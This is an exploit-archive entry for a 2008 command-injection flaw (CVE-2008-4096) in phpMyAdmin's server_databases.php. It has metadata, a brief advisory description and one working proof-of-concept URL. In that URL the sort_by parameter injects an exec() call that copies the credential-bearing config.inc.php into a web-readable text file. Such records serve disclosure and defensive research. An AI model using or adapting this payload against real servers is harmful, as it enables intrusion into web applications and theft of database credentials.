phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution

Author: Norman Hippert
type: webapps
platform: php
port: 
date_added: 2008-09-15 
date_updated: 2014-03-20 
verified: 1 
codes: CVE-2008-4096;OSVDB-48154 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/31188/info

phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

This issue affects versions prior to phpMyAdmin 2.11.9.1.

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]